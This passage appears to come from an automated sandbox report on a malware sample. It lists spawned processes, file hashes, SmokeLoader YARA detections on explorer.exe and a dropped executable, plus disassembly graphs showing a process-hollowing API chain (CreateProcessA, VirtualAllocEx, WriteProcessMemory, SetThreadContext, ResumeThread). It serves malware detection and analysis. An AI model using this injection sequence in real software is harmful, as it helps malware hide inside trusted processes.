                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                                Start time:07:34:07
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                Start time:07:34:08
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp" /SL5="$30436,2863668,56832,C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:708'096 bytes
                                                                                                                                                                                                                                MD5 hash:33358B48CFE67C292BF76ABDDDB63947
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                Start time:07:34:09
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                                                Start time:07:34:09
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                Imagebase:0x7ff633410000
                                                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000002B.00000002.2943867641.0000000002A61000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002B.00000002.2943867641.0000000002A61000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:46
                                                                                                                                                                                                                                Start time:07:34:11
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\ProgramData\jewkkwnf\jewkkwnf.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\ProgramData\jewkkwnf\jewkkwnf.exe
                                                                                                                                                                                                                                Imagebase:0x750000
                                                                                                                                                                                                                                File size:4'249'600 bytes
                                                                                                                                                                                                                                MD5 hash:ABDBCC23BD8F767E671BAC6D2FF60335
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                • Detection: 42%, ReversingLabs
                                                                                                                                                                                                                                • Detection: 33%, Virustotal, Browse
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:47
                                                                                                                                                                                                                                Start time:07:34:12
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:22.1%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:18
                                                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                                                  execution_graph 8643 2f70690 8644 2f706dc WriteProcessMemory 8643->8644 8646 2f70775 8644->8646 8647 2f70040 8648 2f70089 Wow64SetThreadContext 8647->8648 8650 2f70101 8648->8650 8651 140fe58 8652 140fe9c ResumeThread 8651->8652 8654 140fee8 8652->8654 8655 2f70168 8656 2f701ac VirtualAllocEx 8655->8656 8658 2f70224 8656->8658 8659 2f707e8 8660 2f70834 ReadProcessMemory 8659->8660 8662 2f708ac 8660->8662 8663 2f70a18 8664 2f70a9f CreateProcessA 8663->8664 8666 2f70cf4 8664->8666

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 01406630 Relevance: 82.4, Strings: 65, Instructions: 1164COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 1406630-140664d call 1402100 4 1406655-1406657 0->4 5 140664f-1406653 0->5 7 14066c7-14066ce 4->7 5->4 6 1406659-1406662 5->6 8 1406664-140667e 6->8 9 14066d6-1406710 6->9 12 1406680 8->12 13 14066c4 8->13 14 1406712 9->14 15 1406717-1406aaa call 1400fc0 * 2 9->15 16 1406683-1406688 12->16 13->7 14->15 40 1406ab4-1406ad4 15->40 16->9 17 140668a-14066b1 16->17 26 14066b3-14066b7 17->26 27 14066ba-14066bd 17->27 26->27 29 14066d1 27->29 30 14066bf-14066c2 27->30 29->9 30->13 30->16 42 1406ae0-1406b09 40->42 44 1406b14-1406b3e 42->44 117 1406b44 call 1408060 44->117 118 1406b44 call 140813c 44->118 45 1406b4a-14079f0 call 1400fc0 * 3 110 14079fb 45->110 111 1407a0a-1407a62 110->111 115 1407a6d-1407a97 111->115 119 1407a9d call 1408060 115->119 120 1407a9d call 140813c 115->120 116 1407aa3-1407dbe 117->45 118->45 119->116 120->116
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1508852896.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: &$&$&$&$&$-$-$-$-$-$4$4$4$4$4$5$5$5$5$5$:$:$:$:$:$>$>$>$>$>$>$>$>$>$>$P$P$P$P$P$T$T$T$T$T$U$U$U$U$U$Z$Z$Z$Z$Z$[$[$[$[$[$^$^$^$^$^
                                                                                                                                                                                                                                  • API String ID: 0-2631824096
                                                                                                                                                                                                                                  • Opcode ID: def444b73e171dab220ca96b38c6956fee71b00ceac59f34e226c2c6573948fe
                                                                                                                                                                                                                                  • Instruction ID: 16172eda6b94d805965dcf78dc54d03e426ef15653d8c885c4ee5ddd4bc84021
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: def444b73e171dab220ca96b38c6956fee71b00ceac59f34e226c2c6573948fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1D2CFB4D016298FEB64DF29DD447AABBB6FB49301F1081EAD40CA7350DB799E818F44
                                                                                                                                                                                                                                  Function 014030C0 Relevance: 2.8, Instructions: 2835COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1508852896.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 682d8ce48a5010c3b0507c0250c09d567afc5bed16bba45ab8b8da4422f86094
                                                                                                                                                                                                                                  • Instruction ID: 57bd4b692072061c282dc986ef0f666ce72a50263cd20092fd234f0844daecaf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 682d8ce48a5010c3b0507c0250c09d567afc5bed16bba45ab8b8da4422f86094
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94531B74A00219CFDB25DF69C988A9DB7B2FF49310F1581AAD519AB3A1DB34ED81CF40
                                                                                                                                                                                                                                  Function 01402240 Relevance: .8, Instructions: 830COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1508852896.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d5ab0c358ffd978f6bcbd8115e08608adba4ebbd0df1019ad4173777533a4113
                                                                                                                                                                                                                                  • Instruction ID: 1baccf06e32e9ba2384a3ccf29be4d27bcd44dc9aed62882381d4043587c1ab9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5ab0c358ffd978f6bcbd8115e08608adba4ebbd0df1019ad4173777533a4113
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37628234A00615DFDB16DF6AC488E6E7BB6BF88310B15856AE905AB3F1CB71EC41CB50
                                                                                                                                                                                                                                  Function 01405EFA Relevance: .4, Instructions: 429COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1349 1405efa-1405f09 1350 1405fde-1405fe1 1349->1350 1351 1405f0f-1405f21 1349->1351 1353 1405f23-1405f26 1351->1353 1354 1405f36-1405f39 1351->1354 1355 1405fab-1405fb1 1353->1355 1356 1405f2c-1405f2f 1353->1356 1357 1405f49-1405f4f 1354->1357 1358 1405f3b-1405f3e 1354->1358 1359 1405fb3-1405fb5 1355->1359 1360 1405fb7-1405fc3 1355->1360 1361 1405f31 1356->1361 1362 1405f7a-1405f80 1356->1362 1365 1405f51-1405f53 1357->1365 1366 1405f55-1405f61 1357->1366 1363 1405f44 1358->1363 1364 1405fda-1405fdc 1358->1364 1367 1405fc5-1405fd8 1359->1367 1360->1367 1361->1364 1368 1405f82-1405f84 1362->1368 1369 1405f86-1405f92 1362->1369 1363->1364 1364->1350 1370 1405fe2-1406064 1364->1370 1371 1405f63-1405f78 1365->1371 1366->1371 1367->1364 1374 1405f94-1405fa9 1368->1374 1369->1374 1387 1406066-140606c 1370->1387 1388 140607c-1406084 1370->1388 1371->1364 1374->1364 1389 1406070-140607a 1387->1389 1390 140606e 1387->1390 1391 1406230-1406232 1388->1391 1392 140608a-140608c 1388->1392 1389->1388 1390->1388 1393 1406234-1406239 1391->1393 1394 140623c-1406243 1391->1394 1392->1391 1395 1406092-1406096 1392->1395 1393->1394 1396 1406180-1406188 1395->1396 1397 140609c-14060a4 1395->1397 1396->1391 1400 140618e-1406192 1396->1400 1397->1391 1399 14060aa-14060ae 1397->1399 1401 14060b0-14060bf 1399->1401 1402 14060eb-14060fe 1399->1402 1403 1406194-14061a3 1400->1403 1404 14061cc-14061db 1400->1404 1401->1391 1410 14060c5-14060c8 1401->1410 1402->1391 1411 1406104 1402->1411 1403->1391 1412 14061a9-14061ac 1403->1412 1404->1391 1409 14061dd-14061e0 1404->1409 1413 14061e3-14061ec 1409->1413 1414 14060cb-14060ce 1410->1414 1415 1406107-140610d 1411->1415 1416 14061af-14061b2 1412->1416 1418 140624b-140628a 1413->1418 1419 14061ee-14061f3 1413->1419 1414->1418 1420 14060d4-14060dc 1414->1420 1415->1418 1421 1406113-1406119 1415->1421 1417 14061b8-14061c0 1416->1417 1416->1418 1422 1406246 1417->1422 1423 14061c6-14061c8 1417->1423 1437 14062a1-14062b3 call 1402068 1418->1437 1438 140628c-1406290 1418->1438 1424 14061f5-14061fb 1419->1424 1425 1406227-140622a 1419->1425 1420->1422 1426 14060e2-14060e4 1420->1426 1427 140611b-140612b 1421->1427 1428 140616d-1406170 1421->1428 1422->1418 1423->1416 1430 14061ca 1423->1430 1424->1418 1433 14061fd-1406205 1424->1433 1425->1422 1429 140622c-140622e 1425->1429 1426->1414 1434 14060e6 1426->1434 1427->1428 1442 140612d-1406139 1427->1442 1428->1422 1431 1406176-1406179 1428->1431 1429->1391 1429->1413 1430->1391 1431->1415 1436 140617b 1431->1436 1433->1418 1439 1406207-140620d 1433->1439 1434->1391 1436->1391 1452 14062b5-14062bb 1437->1452 1453 14062be-14062cb 1437->1453 1440 1406296-140629e call 1400170 1438->1440 1441 1406607-140664d call 1402100 1438->1441 1439->1425 1444 140620f-140621a 1439->1444 1440->1437 1468 1406655-1406657 1441->1468 1469 140664f-1406653 1441->1469 1442->1418 1446 140613f-1406147 1442->1446 1444->1418 1448 140621c-1406220 1444->1448 1446->1418 1450 140614d-140615c 1446->1450 1448->1425 1450->1418 1454 1406162-1406166 1450->1454 1452->1453 1458 14062db-14062f0 1453->1458 1459 14062cd-14062d6 1453->1459 1454->1428 1463 14062f6-1406303 1458->1463 1464 14063c9-14063fa call 1402368 1458->1464 1459->1464 1463->1464 1471 1406309-140631c call 1405e68 1463->1471 1481 14063ff-1406401 1464->1481 1473 14066c7-14066ce 1468->1473 1469->1468 1472 1406659-1406662 1469->1472 1483 1406356-1406366 call 1405f00 1471->1483 1484 140631e-1406324 1471->1484 1474 1406664-140667e 1472->1474 1475 14066d6-1406710 1472->1475 1485 1406680 1474->1485 1486 14066c4 1474->1486 1488 1406712 1475->1488 1489 1406717-1406b3e call 1400fc0 * 2 1475->1489 1487 14065fc-1406604 1481->1487 1499 1406368 1483->1499 1500 140636a-1406376 1483->1500 1491 1406326-1406328 1484->1491 1492 140632a-1406336 1484->1492 1494 1406683-1406688 1485->1494 1486->1473 1488->1489 1612 1406b44 call 1408060 1489->1612 1613 1406b44 call 140813c 1489->1613 1493 1406338-1406345 1491->1493 1492->1493 1493->1483 1503 1406347-1406354 1493->1503 1494->1475 1497 140668a-14066b1 1494->1497 1520 14066b3-14066b7 1497->1520 1521 14066ba-14066bd 1497->1521 1502 1406378-1406387 1499->1502 1500->1502 1508 14063a0-14063a4 1502->1508 1503->1483 1514 1406389-140639e 1503->1514 1512 14063a6-14063ad 1508->1512 1513 14063af-14063b1 1508->1513 1512->1513 1517 14063b6-14063c4 1512->1517 1513->1487 1514->1508 1517->1464 1517->1487 1520->1521 1524 14066d1 1521->1524 1525 14066bf-14066c2 1521->1525 1524->1475 1525->1486 1525->1494 1540 1406b4a-1407a97 call 1400fc0 * 3 1614 1407a9d call 1408060 1540->1614 1615 1407a9d call 140813c 1540->1615 1611 1407aa3-1407dbe 1612->1540 1613->1540 1614->1611 1615->1611
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1508852896.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 518529b16bb4beafeb4987ecb2fb54c2a1d0a309ccdca731cc33d2820af4bc12
                                                                                                                                                                                                                                  • Instruction ID: 4f19c5845dd7db49f0cf3a19fe47fa4a1b8ef98b7a0908c5f259405e89700ae0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 518529b16bb4beafeb4987ecb2fb54c2a1d0a309ccdca731cc33d2820af4bc12
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DF1D531B00215CFDB16DF6AC554AAE7BB2AF85310F16807ED906AB3A1C735DC52CBA1
                                                                                                                                                                                                                                  Function 01400839 Relevance: .4, Instructions: 407COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1616 1400839-1400868 1617 140086a 1616->1617 1618 140086f-1400875 1616->1618 1617->1618 1619 140087f-14008a6 1618->1619 1622 14008b1-14008b4 1619->1622 1623 14008bd-1400975 1622->1623 1633 140097f-1400984 1623->1633 1700 1400987 call 1400fc0 1633->1700 1701 1400987 call 1400fb0 1633->1701 1634 140098d-1400999 call 14011e0 1635 140099f-14009bc 1634->1635 1637 14009c4-14009d6 call 1401319 1635->1637 1638 14009dc-1400c22 1637->1638 1660 1400c2a-1400c45 call 1401319 1638->1660 1661 1400c4b-1400f66 1660->1661 1696 1400f6e-1400f89 call 1401319 1661->1696 1697 1400f8f-1400f99 1696->1697 1700->1634 1701->1634
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1508852896.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1fe7ba8c416b1c0bb77a4370ec538ae856f94213e4dbc0d438aa854494ece3a4
                                                                                                                                                                                                                                  • Instruction ID: 0fc895742d82f0b8a1b3602dc60f4cb1095b5dadf3db99e8a68846dc46c6cb2a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fe7ba8c416b1c0bb77a4370ec538ae856f94213e4dbc0d438aa854494ece3a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6422CF74A00318CFEB24DF64D854BADBBB2FB88300F2085AAD50967364DB796D85DF91
                                                                                                                                                                                                                                  Function 01400848 Relevance: .4, Instructions: 401COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1704 1400848-1400868 1705 140086a 1704->1705 1706 140086f-1400984 1704->1706 1705->1706 1787 1400987 call 1400fc0 1706->1787 1788 1400987 call 1400fb0 1706->1788 1722 140098d-1400f89 call 14011e0 call 1401319 * 3 1785 1400f8f-1400f99 1722->1785 1787->1722 1788->1722
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1508852896.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fa5dac99f5ef02a6b488408b0d550bdb753de84cc574eba0667ee76b8bfac196
                                                                                                                                                                                                                                  • Instruction ID: 98ad02513efe14567430e3fc2eb1ea9584fae732123d8066fefb0015c393e91e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa5dac99f5ef02a6b488408b0d550bdb753de84cc574eba0667ee76b8bfac196
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E12CF74A00218CFEB24DFA4D854BEDBBB2FB88300F2085A9D50967364DB796D85DF91
                                                                                                                                                                                                                                  Function 02F70A18 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 962 2f70a18-2f70ab1 964 2f70ab3-2f70aca 962->964 965 2f70afa-2f70b22 962->965 964->965 970 2f70acc-2f70ad1 964->970 968 2f70b24-2f70b38 965->968 969 2f70b68-2f70bbe 965->969 968->969 980 2f70b3a-2f70b3f 968->980 978 2f70c04-2f70cf2 CreateProcessA 969->978 979 2f70bc0-2f70bd4 969->979 971 2f70af4-2f70af7 970->971 972 2f70ad3-2f70add 970->972 971->965 973 2f70ae1-2f70af0 972->973 974 2f70adf 972->974 973->973 977 2f70af2 973->977 974->973 977->971 998 2f70cf4-2f70cfa 978->998 999 2f70cfb-2f70de0 978->999 979->978 987 2f70bd6-2f70bdb 979->987 981 2f70b62-2f70b65 980->981 982 2f70b41-2f70b4b 980->982 981->969 984 2f70b4f-2f70b5e 982->984 985 2f70b4d 982->985 984->984 988 2f70b60 984->988 985->984 990 2f70bfe-2f70c01 987->990 991 2f70bdd-2f70be7 987->991 988->981 990->978 992 2f70beb-2f70bfa 991->992 993 2f70be9 991->993 992->992 995 2f70bfc 992->995 993->992 995->990 998->999 1011 2f70de2-2f70de6 999->1011 1012 2f70df0-2f70df4 999->1012 1011->1012 1013 2f70de8 1011->1013 1014 2f70df6-2f70dfa 1012->1014 1015 2f70e04-2f70e08 1012->1015 1013->1012 1014->1015 1016 2f70dfc 1014->1016 1017 2f70e0a-2f70e0e 1015->1017 1018 2f70e18-2f70e1c 1015->1018 1016->1015 1017->1018 1019 2f70e10 1017->1019 1020 2f70e52-2f70e5d 1018->1020 1021 2f70e1e-2f70e47 1018->1021 1019->1018 1021->1020
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02F70CDF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1509779256.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1509746400.0000000002F50000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2f50000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                                                                                                  • Opcode ID: 788b098d9dc47971ce2be48b1f41ba293602ba54671b238b71b881e2bceaa86b
                                                                                                                                                                                                                                  • Instruction ID: 59c2300e67d9e221d8529f4191b90773916f8af2e83f4d9c8256df288d65894c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 788b098d9dc47971ce2be48b1f41ba293602ba54671b238b71b881e2bceaa86b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BC10675D0026D8FDB20CFA8C841BEEBBB1BF49304F0095AAD559B7240DB749A85CF95
                                                                                                                                                                                                                                  Function 02F70690 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1025 2f70690-2f706fb 1027 2f70712-2f70773 WriteProcessMemory 1025->1027 1028 2f706fd-2f7070f 1025->1028 1030 2f70775-2f7077b 1027->1030 1031 2f7077c-2f707ce 1027->1031 1028->1027 1030->1031
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02F70763
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1509779256.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1509746400.0000000002F50000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2f50000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                                                  • Opcode ID: 9a22571ef6e54b21e72aa67bde7c28309537edc1aefcf14aacdff995b9e5c945
                                                                                                                                                                                                                                  • Instruction ID: c60b57cda836607f504d37f6819e1cf161efef9541f58c849ca7f89ca05ab9ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a22571ef6e54b21e72aa67bde7c28309537edc1aefcf14aacdff995b9e5c945
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E34199B5D012589FDF00CFA9D984ADEBBF1BF49310F14902AE918B7240D779AA45CF64
                                                                                                                                                                                                                                  Function 02F707E8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1036 2f707e8-2f708aa ReadProcessMemory 1039 2f708b3-2f70905 1036->1039 1040 2f708ac-2f708b2 1036->1040 1040->1039
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02F7089A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1509779256.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1509746400.0000000002F50000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2f50000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                                                                                  • Opcode ID: 8634f8d379edc67db72ab644c3a4514680e66d00a9aa33b685a0f11a6388be1e
                                                                                                                                                                                                                                  • Instruction ID: 49a48132cc092e6253a3a6e9b7a8c5d95f8aee8c906a0d26123acbe850a21d06
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8634f8d379edc67db72ab644c3a4514680e66d00a9aa33b685a0f11a6388be1e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1341A9B9D042589FCF00CFAAD980AEEFBB1BF09310F14942AE814B7200D775A945CF64
